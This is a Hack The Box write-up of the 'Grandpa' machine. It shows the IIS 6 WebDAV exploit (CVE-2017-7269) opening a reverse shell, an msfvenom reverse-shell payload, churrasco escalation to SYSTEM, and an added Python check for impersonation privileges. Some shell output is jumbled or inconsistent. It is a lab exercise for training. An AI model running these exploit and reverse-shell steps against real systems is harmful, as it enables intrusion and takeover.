
Introduction


Grandpa is an easy-rated machine on Hack The Box. It has a rating of only 3.6, which is decent but not high, so either this is a very easy exploit or there is something to brute force. Without talking too much, I will just start with the enumeration.

Enumeration


As always I use Nmap to scan the box.

Nmap Scan


The first thing I always do is an Nmap scan of all ports:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ sudo nmap -sS -vv -p- 10.10.10.14
[sudo] password for user: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 20:08 CEST
Initiating Ping Scan at 20:08
Scanning 10.10.10.14 [4 ports]
Completed Ping Scan at 20:08, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:08
Completed Parallel DNS resolution of 1 host. at 20:08, 0.00s elapsed
Initiating SYN Stealth Scan at 20:08
Scanning 10.10.10.14 [65535 ports]
Discovered open port 80/tcp on 10.10.10.14
SYN Stealth Scan Timing: About 18.82% done; ETC: 20:11 (0:02:14 remaining)
SYN Stealth Scan Timing: About 46.81% done; ETC: 20:11 (0:01:09 remaining)
Completed SYN Stealth Scan at 20:10, 105.91s elapsed (65535 total ports)
Nmap scan report for 10.10.10.14
Host is up, received echo-reply ttl 127 (0.026s latency).
Scanned at 2021-08-29 20:08:59 CEST for 106s
Not shown: 65534 filtered ports
Reason: 65534 no-responses
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 106.12 seconds
           Raw packets sent: 131154 (5.771MB) | Rcvd: 96 (4.780KB)

There is only one open port, so I run an -A scan against it:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ sudo nmap -A -p 80 10.10.10.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 20:12 CEST
Nmap scan report for 10.10.10.14
Host is up (0.058s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE 
|   MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Server Date: Sun, 29 Aug 2021 18:20:40 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, 
|   PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Device type: general purpose|media device
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (93%)
Aggressive OS guesses: Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (93%), 
Microsoft Windows Server 2003 SP1 (93%), Microsoft Windows Server 2003 SP1 or SP2 (93%),
 Microsoft Windows Server 2003 SP2 (93%), Microsoft Windows 2003 SP2 (91%), 
Microsoft Windows 2000 SP3/SP4 or Windows XP SP1/SP2 (90%), 
Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP3 (90%), 
Microsoft Windows 2000 SP1 (90%), Microsoft Windows 2000 SP4 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   41.74 ms 10.10.16.1
2   62.40 ms 10.10.10.14

Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds

Web Server Enumeration


The only open port is 80, on which IIS 6 runs. Since I do not have much information, I search for an exploit. There is the WebDAV remote code execution vulnerability (CVE-2017-7269), and I found an exploit for it on GitHub:

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

Exploitation


I use the exploit found above. I download it and execute it with Python:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ python exploit.py grandpa.htb 80 10.10.17.28 4444
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
---snip---

After waiting a bit, a reverse shell spawns in my Netcat listener:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ nc -lvnp 4444               
listening on [any] 4444 ...
connect to [10.10.17.28] from (UNKNOWN) [10.10.10.14] 1032
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

c:\windows\system32\inetsrv>c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

I cannot read the user flag (user Harry), so I need to escalate my privileges.

Privilege Escalation


I used Windows Exploit Suggester:

Date: 20140812                          
CVE: CVE-2014-1819                          
KB: KB2993651                                                                    
Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component:                    
Severity: Important                     
Impact: Elevation of Privilege                             
Exploit: n/a                                      
                                                           
Date: 20140812     
CVE: CVE-2014-1819                          
KB: KB2993651                                                                    
Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation of Privilege    
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component:                              
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

I could not find a public exploit for these CVEs, so I remembered that on the Granny box I used a tool called churrasco (which works like an automated Juicy Potato). I check whether it works here as well:

C:\Documents and Settings>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled
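
To make the check above repeatable, here is an added Python example (not code from the original write-up) that parses `whoami /priv` output and flags the token-impersonation privileges; the sample output is the session above, and treating exactly two privileges as the high-risk set is an assumption.

```python
# Added example, not part of the original write-up: audit `whoami /priv` output
# for privileges that let a service account use other accounts' tokens (what
# Potato-style tools such as churrasco rely on). Sample output copied from above.
from typing import Dict, List

# Treating exactly these two privileges as the high-risk set is an assumption.
TOKEN_ABUSE_PRIVILEGES = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Return {privilege name: state}. The first token of a row is the name
    and the last is the state, so the spaced description never needs parsing."""
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) >= 2 and tokens[0].startswith("Se") \
                and tokens[-1] in ("Enabled", "Disabled"):
            privs[tokens[0]] = tokens[-1]
    return privs

def audit_token(text: str) -> Dict[str, object]:
    """Flag token-abuse privileges held by the account. A 'Disabled' privilege
    is still in the token and the process can enable it itself via
    AdjustTokenPrivileges, so it counts as held; only absent ones are unavailable."""
    privs = parse_whoami_priv(text)
    held: List[str] = sorted(p for p in privs if p in TOKEN_ABUSE_PRIVILEGES)
    enabled = [p for p in held if privs[p] == "Enabled"]
    return {"held": held, "enabled": enabled, "at_risk": bool(held)}

if __name__ == "__main__":
    result = audit_token(SAMPLE_WHOAMI_PRIV)
    for priv in result["held"]:
        state = "Enabled" if priv in result["enabled"] else "Disabled (can be enabled)"
        print(f"{priv}: {state}")
    print("token impersonation escalation possible:", result["at_risk"])
```

If a service account comes back at risk, the mitigation is to run that service under an account that does not hold these privileges.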

SeImpersonatePrivilege is enabled, so the token impersonation attack should work. I start an SMB server to transfer the file:

┌──(user㉿KaliVM)-[/tools/Churrasco]
└─$ ll
total 352
-rw-r--r-- 1 user user  10364 Aug 17 09:09 Churrasco.cpp
-rw-r--r-- 1 user user  31232 Aug 17 09:09 churrasco.exe
-rw-r--r-- 1 user user  52224 Aug 17 09:09 Churrasco.ncb
-rw-r--r-- 1 user user    907 Aug 17 09:09 Churrasco.sln
-rw-r--r-- 1 user user   9216 Aug 17 09:09 Churrasco.suo
-rw-r--r-- 1 user user   3921 Aug 17 09:09 Churrasco.vcproj
-rw-r--r-- 1 user user  16744 Aug 17 09:09 Churrasco.zip
-rw-r--r-- 1 user user     43 Aug 17 09:09 README.md
-rw-r--r-- 1 user user   1316 Aug 17 09:09 ReadMe.txt
-rw-r--r-- 1 user user    296 Aug 17 09:09 stdafx.cpp
-rw-r--r-- 1 user user    501 Aug 17 09:09 stdafx.h
 
┌──(user㉿KaliVM)-[/tools/Churrasco]
└─$ sudo impacket-smbserver kali .
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Now, I can transfer the file to the target machine:

C:\temp>copy \\10.10.17.28\kali\churrasco.exe
copy \\10.10.17.28\kali\churrasco.exe
        1 file(s) copied.

C:\temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\temp

08/29/2021  09:49 PM    <DIR>          .
08/29/2021  09:49 PM    <DIR>          ..
08/17/2021  10:09 AM            31,232 churrasco.exe
               1 File(s)         31,232 bytes
               2 Dir(s)  18,091,016,192 bytes free

You just need to run the executable. To execute commands I use the -d flag, which takes the command to run (here cmd.exe):

C:\temp>churrasco.exe -d "cmd.exe"
churrasco.exe -d "cmd.exe"
nt authority\system

C:\WINDOWS\TEMP>whoami
whoami
nt authority\system
C:\temp>whoami
whoami
C:\ADFS>ipconfig
ipconfig
nt authority\network service

The shell seems pretty buggy, so I create an msfvenom payload to get another reverse shell:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.17.28 lport=5555 -f exe -o sh.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
       
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ nc -lvnp 5555      
listening on [any] 5555 ...

Transfer the payload and run churrasco again:

C:\temp>copy \\10.10.17.28\kali\sh.exe
copy \\10.10.17.28\kali\sh.exe
nt authority\system

C:\temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\temp

08/29/2021  09:57 PM    <DIR>          .
08/29/2021  09:57 PM    <DIR>          ..
08/17/2021  10:09 AM            31,232 churrasco.exe
08/29/2021  09:48 PM            73,802 sh.exe
               2 File(s)        105,034 bytes
               2 Dir(s)  18,090,938,368 bytes free

C:\temp>churrasco.exe -d "sh.exe"
churrasco.exe -d "sh.exe"
        1 file(s) copied.

The output still seems buggy, but nevertheless I got the shell:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.17.28] from (UNKNOWN) [10.10.10.14] 1037
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\temp>whoami
whoami
nt authority\system

Time to get both flags.

Flags


I never got privileges as user Harry, so with this high-privileged shell I can get both flags:

C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
bd**************************d869
C:\Documents and Settings\Harry\Desktop>type ..\..\Administrator\Desktop\root.txt
type ..\..\Administrator\Desktop\root.txt
93**************************bb7b

Conclusions


This box was very easy because it was basically the same as Granny.